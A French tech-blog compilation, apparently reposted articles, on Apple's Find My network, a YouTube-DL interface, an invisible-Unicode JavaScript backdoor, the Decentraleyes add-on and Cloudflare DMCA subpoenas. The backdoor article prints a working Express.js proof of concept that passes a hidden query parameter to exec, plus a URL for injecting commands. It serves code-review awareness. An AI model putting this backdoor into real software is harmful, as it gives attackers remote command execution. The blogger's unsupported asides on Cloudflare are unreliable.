Comment le réseau Localiser a pu aider la police à retrouver un iPhone volé

Cette nouveauté requiert au minimum un iPhone 11, car elle exploite la puce U1 Ultra Wideband. L’iPhone peut communiquer avec le réseau Localiser jusqu’à 24 heures après une extinction manuelle ou bien (c’est une nouveauté d’iOS 15.2) jusqu’à 5 heures quand il est en mode Réserve, autrement dit après qu’il se soit éteint tout seul.

Après les cartes de transport, quelques pass, les clés et la localisation, d’autres fonctions deviendront-elles disponibles même lorsque les iPhone semblent dormir?

Source: iGénération

 

 

Une super interface pour Youtube-DL

@Korben  —  6 janvier 2022

Si après avoir lu mon formidable article sur la maîtrise de YouTube-dl, vous ne vous en sortez toujours pas, il vous faut une interface graphique !

Et bonne nouvelle, Open Video Downloader est là pour vous servir. Ce logiciel open source qui fonctionne sous macOS, Linux et Windows (car Electron JS ftw) vous permettra de télécharger simplement des vidéos en provenance de YouTube, mais également Vimeo, Twitter et j’en passe.

Il utilise bien sûr Youtube-DL et permet de récupérer soit des vidéos seules, soit carrément des playlists voire l’ensemble du contenu d’une chaine.

Vous pouvez choisir la résolution dans laquelle vous voulez la vidéo, uniquement le son si vous voulez et choper également des vidéos privées grâce au support des cookies.

La GUI est capable de télécharger jusqu’à 32 vidéos en simultanée et comme YouTube DL évolue très vite (car c’est le jeu du chat et de la souris avec les plateformes), et bien Open Video Downloader le mettra à jour automatiquement.

Vous trouverez Open Video Downloader ici.

 

REF.:   https://korben.info/youtubedl-interface.html?fbclid=IwAR0drIU_o5JGVOdJnIQY-xC_Yt8sTclQP8SwoRiM7kZ-Lp33GuJAdff6wnY

 

 

Une backdoor invisible en JavaScript

@Korben  —  8 janvier 2022

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

 

REF.:   https://korben.info/backdoor-invisible-javascript.html

 

Decentraleyes,un add-on de Firefox ,Chrome,contre le pîstage:

Decentraleyes par Thomas Rientjes

Recommandé

Protège du pistage lié aux diffuseurs de contenus « gratuits », centralisés. Accélère de nombreuses requêtes (Google Hosted Libraries et autres) en les servant localement, allégeant la charge des sites. Complète les bloqueurs de contenus habituels.

 Les sites web dépendent de plus en plus de bibliothèques tierces pour proposer du contenu. En général, annuler les requêtes pour les publicités ou traqueurs ne pose pas de problèmes. Cependant, bloquer le véritable contenu casse évidemment les pages. L'objectif de cet add-on est de supprimer l'intermédiaire en proposant à la vitesse de l'éclair la livraison de fichiers (regroupés) en local afin d'améliorer la protection des données personnelles en ligne.

     • Protège la confidentialité en contournant les diffuseurs de contenus prétendant offrir des services gratuits.
     • Complète les bloqueurs connus tels que uBlock origin (recommandé), Adblock Plus et autres.
     • Fonctionne directement tel quel ne nécessitant aucune configuration préalable.

Remarque: Decentraleyes n'est pas une panacée mais il empêche de nombreux sites de vous contraindre à l'envoi de telles requêtes. Il est possible aussi d'indiquer à Decentraleyes de bloquer les requêtes manquantes.

   > Présentation plus simple: https://git.synz.io/Synzvato/decentraleyes/wikis/Simple-Introduction

Suis-je actuellement protégé ?

Un vérificateur indique si vous êtes correctement protégé. C'est la méthode conseillée et la plus rapide pour savoir si l'add-on est installé, activé et correctement configuré.

   > Lien vers ce vérificateur: https://decentraleyes.org/test

 Adguard,pour ceux qui le connaisse, ne bloque pas le CDN. Vous aurez peut-être besoin de l'extension Decentraleyes dans le navigateur Firefox et la boutique en ligne Chrome pour bloquer le CDN. Decentraleyes pour le navigateur Firefox par Thomas Rientjes Recommandé Vous protège contre le traçage grâce à la livraison de contenu "gratuit" et centralisé. Il empêche de nombreuses demandes d'atteindre des réseaux tels que les bibliothèques hébergées par Google et sert des fichiers locaux pour empêcher les sites de se briser. Complète les bloqueurs de contenu habituels. Protège la confidentialité en évitant les grands réseaux de distribution qui prétendent offrir des services gratuits. • Complète les bloqueurs réguliers tels que uBlock Origin (recommandé), Adblock Plus, et al. • Fonctionne directement hors de la boîte ; absolument aucune configuration préalable requise. Remarque : Decentraleyes n'est pas une solution miracle, mais cela empêche de nombreux sites Web de vous faire envoyer ce genre de demandes. En fin de compte, vous pouvez également faire en sorte que Decentraleyes bloque les demandes pour toutes les ressources CDN manquantes.

REF.:   https://addons.mozilla.org/fr/firefox/addon/decentraleyes/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search

https://chrome.google.com/webstore/detail/decentraleyes/ldpochfccmkkmhdbclfhpagapcfdljkj

Cloudflare fait appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs» ....Hackers :

 

Cloudflare fait  appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs» ....Hackers :

 Des assignations à comparaître ciblant plus de 35 000 noms de domaine de clients Cloudflare en six mois,du déja vu ;-) 

 

Alors beaucoup de nerds emploi d'autres outils pour y parvenir,comme:

 https://www.robtex.com/

 https://urlscan.io/

 https://ipsnoop.com/34.147.109.202 (exemple)

Ces outils vont vous révéler sur quel sites le hackers a enregistrés son site web frauduleux, souvent le site disparaît assez vites  ;-)

 

 Cloudflare ne supprime rien en réponse aux avis de retrait DMCA, à moins qu'il ne stocke le contenu de manière permanente sur son réseau. 

Cependant, la société remettra les données personnelles des clients aux titulaires de droits d'auteur qui obtiennent une citation à comparaître DMCA. Au cours du premier semestre 2021, des citations à comparaître civiles ont ciblé des centaines de clients liés à plus de 35 000 domaines. 

 logo cloudflare

 Service de protection CDN et DDoS populaire Cloudflare a subi de nombreuses pressions de la part des titulaires de droits d'auteur ces dernières années. L'entreprise propose ses services à des millions de sites. Cela inclut les multinationales, les gouvernements, mais aussi certains des principaux sites pirates au monde. Tous les titulaires de droits ne sont pas satisfaits de ce dernier.

 Certains ont accusé Cloudflare de faciliter la violation du droit d'auteur en continuant à fournir l'accès à ces plateformes. Dans le même temps, ils font appel au service CDN pour masquer les véritables lieux d'hébergement de ces «mauvais acteurs». Cloudflare voit les choses différemment. 

L'entreprise se positionne comme un fournisseur de services neutre qui n'héberge aucun contenu illicite. Ils ne font que transmettre des informations qui sont temporairement mises en cache sur ses services.(souvent des faussetés). 

Demandes de suppression et de blocage

 Auparavant, les tribunaux avaient ordonné à Cloudflare de bloquer des sites spécifiques, mais aucune nouvelle ordonnance n'est intervenue au cours du premier semestre de l'année dernière(sinon Cloudflare serait en faillite car il coopère aux piéage des hackers avec les services de l'états,un Honeypot légal ). La société a répondu à plusieurs demandes de retrait DMCA. Dans ces cas, le contenu signalé est stocké sur le réseau de Cloudflare. Ces demandes régulières de retrait DMCA ont ciblé 32 comptes et 367 noms de domaine au cours de la période de référence. Il s'agit d'une augmentation significative par rapport à l'année précédente où 4 comptes et 4 noms de domaine avaient été impactés. Domaines ciblés par des avis DMCA réguliers dmca Outre les problèmes de droits d'auteur, Cloudflare répond également à d'autres demandes d'application, notamment les ordres de piégeage et de commerce et les mandats de perquisition(c'est là où est situé la cryptomonnaie,les attaques XSS,les malwares,etc...). Ceux-ci ont également augmenté au fil des ans. 

Ces augmentations ne sont pas vraiment inattendues car Cloudflare a considérablement développé son activité, explique la société. « Bien qu'il y ait eu une augmentation constante du nombre de demandes d'application de la loi depuis notre premier rapport de transparence en 2013, cela est dû en partie à l'augmentation exponentielle du nombre de domaines clients Cloudflare au cours de cette période. » 

Une copie du rapport de transparence complet de Cloudflare est disponible sur le site officiel de la société.(mais c'est seulement du papier sans volonté)

 

Nota: Un CDN c'est, un réseau de diffusion de contenu (RDC) ou en anglais content delivery network (CDN) est constitué d’ordinateurs reliés en réseau à travers Internet et qui coopèrent afin de mettre à disposition du contenu ou des données à des utilisateurs.

Ce réseau est constitué :

• de serveurs d'origine, d'où les contenus sont « injectés » dans le RDC pour y être répliqués ;
• de serveurs périphériques, typiquement déployés à plusieurs endroits géographiquement distincts, où les contenus des serveurs d'origine sont répliqués ;
• d'un mécanisme de routage permettant à une requête utilisateur sur un contenu d'être servie par le serveur le « plus proche », dans le but d’optimiser le mécanisme de transmission / livraison.

Les serveurs (ou nœuds) sont généralement connectés à Internet à travers différentes dorsales Internet.

L’optimisation peut se traduire par la réduction des coûts de bande passante, l’amélioration de l’expérience utilisateur (réduction de la latence), voire les deux.

Le nombre de nœuds et de serveurs qui constituent un RDC varie selon les choix d’architecture, certains pouvant atteindre plusieurs milliers de nœuds et des dizaines de milliers de serveurs.

REF.:   https://torrentfreak.com/subpoenas-targeted-over-35000-cloudflare-customer-domain-names-in-six-months-220109/